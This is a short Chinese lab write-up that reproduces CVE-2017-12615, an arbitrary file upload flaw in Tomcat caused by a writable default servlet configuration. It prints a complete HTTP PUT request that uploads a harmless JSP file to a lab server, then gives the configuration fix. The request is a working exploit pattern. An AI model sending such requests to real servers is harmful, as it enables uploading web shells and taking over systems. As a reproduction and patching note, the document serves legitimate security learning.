0x00 前言

CVE-2017-12615是tomcat之前的任意文件上传的漏洞，因整理poc以及未进行过复现，故进行复习。

造成原因

tomcat/conf/web.xml配置文件中readonly为false。

0x01 复现

1.环境

这里进行docker下载之后有点慢，于是使用阿里云进行加速。

2.过程演示

去docker中看了一下web.xml的配置

这里可以直接去构造数据包

PUT /1.jsp/ HTTP/1.1
Host: 192.168.25.242:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

<% out.println("HelloWorld");%>

这里返回201，表示创建成功

这里查看上传效果

0x02 修复方式

这里修复就要关闭tomcat/conf/web.xml配置文件中readonly